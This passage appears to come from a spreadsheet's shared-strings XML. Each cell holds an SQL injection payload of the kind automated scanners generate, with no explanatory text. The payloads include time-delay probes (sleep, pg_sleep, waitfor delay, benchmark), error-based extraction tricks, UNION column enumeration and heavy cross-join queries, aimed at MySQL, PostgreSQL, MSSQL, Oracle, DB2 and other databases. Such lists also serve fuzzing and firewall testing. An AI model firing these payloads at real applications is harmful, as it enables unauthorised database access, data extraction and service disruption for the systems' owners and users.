    <t>1'  )  )   as omwk where 1414 = 1414 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "avyw" = "avyw</t>
  </si>
  <si>
    <t>1 )  where 7159 = 7159</t>
  </si>
  <si>
    <t>1%'  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'exls' where 3837 = 3837 and sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>-9739' or 8571 = 8571--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  "vzye" = "vzye</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>select  ( case when  ( 5290 = 1720 )  then 5290 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1" )  as mibc where 3113 = 3113</t>
  </si>
  <si>
    <t>-1621' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select  ( case when  ( 9619 = 8679 )  then 1 else 9619* ( select 9619 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-1700%' or 4149 = 3391#</t>
  </si>
  <si>
    <t>1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and 'cipk' = 'cipk</t>
  </si>
  <si>
    <t>1" )  as esks where 1138 = 1138</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and 'rpka' = 'rpka</t>
  </si>
  <si>
    <t>1 where 5485 = 5485 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   as cbdx where 8998 = 8998 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>if ( 4735 = 8907 )  select 4735 else drop function qigo--</t>
  </si>
  <si>
    <t>1%"  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-3044' )  or 4999 = 3051#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 'ahjo' = 'ahjo</t>
  </si>
  <si>
    <t>1"  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( "czvm" like "czvm</t>
  </si>
  <si>
    <t>1  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-4542 union all select 1249,1249,1249,1249,1249,1249,1249,1249,1249--</t>
  </si>
  <si>
    <t>1%' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-9363%' or  ( 8459 = 8459 ) *4906 and '%' = '</t>
  </si>
  <si>
    <t>-2896'  )  )   as wisk where 1030 = 1030 union all select 1030,1030,1030,1030#</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and '%' = '</t>
  </si>
  <si>
    <t>1" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "okpa" = "okpa</t>
  </si>
  <si>
    <t>-9941 union all select 1321,1321,1321,1321,1321,1321,1321#</t>
  </si>
  <si>
    <t>1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and 'ejdk' like 'ejdk</t>
  </si>
  <si>
    <t>1" )  or sleep ( 5 )  and  ( "fiag" like "fiag</t>
  </si>
  <si>
    <t>1'  )  )   as iipj where 6560 = 6560</t>
  </si>
  <si>
    <t>1"  )  )   as chal where 6661 = 6661</t>
  </si>
  <si>
    <t>-6389" union all select 2355,2355,2355,2355,2355--</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 7646 = 7646 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-9145%'  )  )   )  or make_set ( 9017 = 9368,9368 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "eoab" like "eoab</t>
  </si>
  <si>
    <t>1" )  as wxea where 6394 = 6394 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'qipt' = 'qipt</t>
  </si>
  <si>
    <t>-4811%'  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char</t>
  </si>
  <si>
    <t>1%'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  1476 = 1476</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) -- dtha</t>
  </si>
  <si>
    <t>1' in boolean mode )  and elt ( 4249 = 4249,7259 ) #</t>
  </si>
  <si>
    <t>1%"  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and "%" = "</t>
  </si>
  <si>
    <t>1' )  where 6305 = 6305 rlike  ( select  ( case when  ( 8326 = 9749 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1' where 1031 = 1031 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-8234'  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' )  as taay where 7027 = 7027 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1'+ ( select kfmv where 1679 = 1679</t>
  </si>
  <si>
    <t>-5362 )  union all select 7297,7297,7297,7297,7297#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>1' and 7533 = 7533 and 'frvk' = 'frvk</t>
  </si>
  <si>
    <t>1 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # ehsr</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( case when 6398 = 6398 then 1 else null end ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 1946 = 1302 )  then 1946 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1%' or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 7425 = 3843,3843 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'agsi' = 'agsi</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'pemj' = 'pemj</t>
  </si>
  <si>
    <t>-9439" )  where 9460 = 9460 or  ( 9497 = 9586 ) *9586--</t>
  </si>
  <si>
    <t>-6007"  )  )   union all select 6019,6019,6019,6019,6019,6019,6019,6019--</t>
  </si>
  <si>
    <t>1' where 3900 = 3900 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'hbho' from dual where 7193 = 7193</t>
  </si>
  <si>
    <t>1 )  as azoo where 8933 = 8933 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>1" and 9198 = 9198--</t>
  </si>
  <si>
    <t>-5125 union all select 5720,5720,5720,5720,5720,5720,5720,5720--</t>
  </si>
  <si>
    <t>-3362' where 6567 = 6567 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and 'roca' = 'roca</t>
  </si>
  <si>
    <t>1%" )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1' and 7528 = 2894 and 'qoyw' = 'qoyw</t>
  </si>
  <si>
    <t>1" )  as giqb where 4664 = 4664</t>
  </si>
  <si>
    <t>1" and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "ouix" = "ouix</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select * from generate_series ( 5206,5206,case when  ( 5206 = 2214 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-4772  )  )   )  union all select 3879,3879,3879,3879,3879--</t>
  </si>
  <si>
    <t>1' where 9216 = 9216</t>
  </si>
  <si>
    <t>1"  )  )   as thoj where 1577 = 1577 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'setd' from dual where 3686 = 3686  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users  )  )  ||'</t>
  </si>
  <si>
    <t>-5313"  )  )   )  union all select 9189,9189,9189,9189,9189,9189,9189,9189--</t>
  </si>
  <si>
    <t>1%' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and '%' = '</t>
  </si>
  <si>
    <t>1 )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 2868 = 2868</t>
  </si>
  <si>
    <t>1%" )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1 )  where 8320 = 8320 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>1' )  where 5378 = 5378</t>
  </si>
  <si>
    <t>-2929"  )  )   )  union all select 8999,8999#</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'-- thuo</t>
  </si>
  <si>
    <t>1 )  where 2390 = 2390</t>
  </si>
  <si>
    <t>1wwis</t>
  </si>
  <si>
    <t>1'|| ( select 'lije' from dual where 5309 = 5309 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) ||'</t>
  </si>
  <si>
    <t>1'|| ( select 'ejuu' from dual where 2903 = 2903 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'rspz' = 'rspz</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'jhle' like 'jhle</t>
  </si>
  <si>
    <t>1%" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) </t>
  </si>
  <si>
    <t>1 rlike  ( select  ( case when  ( 6795 = 5898 )  then 1 else 0x28 end  )  )  -- xdkx</t>
  </si>
  <si>
    <t>1" where 8697 = 8697 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' and 9970 = 3409</t>
  </si>
  <si>
    <t>1  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  9270 = 9270</t>
  </si>
  <si>
    <t>1' where 1917 = 1917 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9699"  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  "dufs" = "dufs</t>
  </si>
  <si>
    <t>1'|| ( select 'zifu' from dual where 4822 = 4822 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'vcph' = 'vcph</t>
  </si>
  <si>
    <t>if ( 9953 = 4347 )  select 9953 else drop function ocau--</t>
  </si>
  <si>
    <t>-9644  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>1" )  and elt ( 4249 = 4249,7259 )  and  ( "upkx" = "upkx</t>
  </si>
  <si>
    <t>-7485"  )  )   as caob where 4100 = 4100 union all select 4100,4100,4100,4100,4100,4100,4100,4100--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( "zsjw" like "zsjw</t>
  </si>
  <si>
    <t>1" and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as puws where 7006 = 7006</t>
  </si>
  <si>
    <t>1 )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and "vnei" like "vnei</t>
  </si>
  <si>
    <t>1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "bzzt" like "bzzt</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and "gjtx" like "gjtx</t>
  </si>
  <si>
    <t>1"  )  )   as sgln where 7573 = 7573</t>
  </si>
  <si>
    <t>-7962'  )  )   as pgqz where 6058 = 6058 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  5171 = 5171</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-6220' union all select 1462,1462#</t>
  </si>
  <si>
    <t>1' )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) </t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  5139 = 5139</t>
  </si>
  <si>
    <t>1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'bkcs' = 'bkcs</t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and 'xnap' = 'xnap</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 3348 = 1710 )  then 3348 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1" )  as idwa where 2545 = 2545 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "dqou" like "dqou</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "rqxd" = "rqxd</t>
  </si>
  <si>
    <t>1'+ ( select 'bmit' where 3716 = 3716 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>-9622'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>-5637%"  )  )   )  or 6872 = 6872 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">make_set ( 7729 = 7729,1 ) </t>
  </si>
  <si>
    <t>1'  )  )   and sleep ( 5 )  and   (  (  'jiio' like 'jiio</t>
  </si>
  <si>
    <t xml:space="preserve">-5014" )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 </t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1"  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  "bely" = "bely</t>
  </si>
  <si>
    <t xml:space="preserve">1' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) </t>
  </si>
  <si>
    <t>1" )  where 2602 = 2602 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' where 2673 = 2673</t>
  </si>
  <si>
    <t>1  )  )   as nlzg where 1482 = 1482 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>-2256"  )  )   )  or 1971 = 4537#</t>
  </si>
  <si>
    <t xml:space="preserve">-7199' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>-2050' union all select 5606#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6130 = 6130,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>1'  )  )   as qqvk where 1007 = 1007</t>
  </si>
  <si>
    <t>1"  )  )   as tfjh where 1134 = 1134 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "frgb" like "frgb</t>
  </si>
  <si>
    <t>1 union all select null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( "tlbp" = "tlbp</t>
  </si>
  <si>
    <t>select case when 7951 = 1147 then 1 else null end--</t>
  </si>
  <si>
    <t>-4926" where 8152 = 8152 or 4339 = 5547#</t>
  </si>
  <si>
    <t>-7409"  )  )   union all select 3145,3145,3145--</t>
  </si>
  <si>
    <t>select * from generate_series ( 9709,9709,case when  ( 9709 = 7795 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-6803" )  order by 1#</t>
  </si>
  <si>
    <t>1'  )  )   as yqcl where 5026 = 5026 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1'  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-2375 union all select 1573,1573,1573,1573#</t>
  </si>
  <si>
    <t>-4222' )  union all select 9267,9267,9267,9267,9267,9267--</t>
  </si>
  <si>
    <t>1' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and 'ukoc' like 'ukoc</t>
  </si>
  <si>
    <t>1 )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 4666 = 4666</t>
  </si>
  <si>
    <t>-8844"  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" )  as zopq where 2680 = 2680</t>
  </si>
  <si>
    <t>1%" )  order by 1#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  'wusq' = 'wusq</t>
  </si>
  <si>
    <t>1" )  as jiiq where 6847 = 6847</t>
  </si>
  <si>
    <t>1'|| ( select 'feki' where 4082 = 4082 and  ( 3587 = 4207 ) *4207 ) ||'</t>
  </si>
  <si>
    <t>1'+ ( select 'xqjx' where 7048 = 7048 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 8738 = 8738</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1539 = 1539,1539,1/0 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1%" )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'iqvg' = 'iqvg</t>
  </si>
  <si>
    <t>1%"  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1" )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-4756%'  )  )   union all select 7824,7824,7824,7824,7824,7824,7824,7824#</t>
  </si>
  <si>
    <t>select  ( case when  ( 5970 = 2200 )  then 1 else 5970* ( select 5970 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( 'fuvv' = 'fuvv</t>
  </si>
  <si>
